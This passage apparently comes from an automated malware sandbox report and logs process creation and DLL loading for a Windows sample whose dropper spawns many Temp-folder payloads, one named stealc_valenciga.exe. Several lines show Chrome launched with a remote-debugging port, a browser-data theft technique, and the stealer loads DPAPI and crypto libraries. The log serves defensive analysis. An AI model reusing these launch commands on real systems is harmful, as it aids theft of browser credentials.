                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe "C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe "C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe "C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe"
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2992 --field-trial-handle=2872,i,6481085930284923774,17691791159030812359,262144 /prefetch:8
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe "C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe "C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe"
                                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeProcess created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe "C:\Users\user\AppData\Local\Temp\1004899001\am209.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe "C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe "C:\Users\user\AppData\Local\Temp\1009574001\gold123.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe "C:\Users\user\AppData\Local\Temp\1010458001\liddad.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe "C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe "C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe "C:\Users\user\AppData\Local\Temp\1010749001\3e641862d3.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeProcess created: C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe "C:\Users\user\AppData\Local\Temp\1010750001\305d0bf1b2.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeProcess created: C:\Users\user\AppData\Local\Temp\1001527001\legs.exe "C:\Users\user\AppData\Local\Temp\1001527001\legs.exe"Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeProcess created: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe "C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2132,i,6862776677671730943,9850295633516414463,262144 /prefetch:8
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2992 --field-trial-handle=2872,i,6481085930284923774,17691791159030812359,262144 /prefetch:8
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exeProcess created: C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe "C:\Users\user\AppData\Local\Temp\1010456001\gold1111111111.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeProcess created: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe "C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exe"
                                  Source: C:\Users\user\AppData\Local\Temp\1010681001\client_jackbastadguy.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                                  Source: C:\Users\user\AppData\Local\Temp\1010747001\0d261d49cf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                  Source: C:\Users\user\AppData\Local\Temp\1010748001\834ad20df2.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2992 --field-trial-handle=2872,i,6481085930284923774,17691791159030812359,262144 /prefetch:8
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: mstask.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: dui70.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: duser.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: chartv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: oleacc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: atlthunk.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\Desktop\ebjtOH70jl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: mstask.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: dui70.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: duser.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: chartv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: oleacc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: atlthunk.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: wtsapi32.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: winsta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: explorerframe.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1004899001\am209.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: wininet.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\fc9e0aaab7\defnur.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: winhttp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: webio.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: winnsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: schannel.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: mskeyprotect.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ntasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ncrypt.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ncryptsslp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: gpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: wbemcomn.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: amsi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1001527001\legs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: apphelp.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: sspicli.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: wininet.dll
                                  Source: C:\Users\user\AppData\Local\Temp\1008659001\stealc_valenciga.exeSection loaded: rstrtmgr.dll
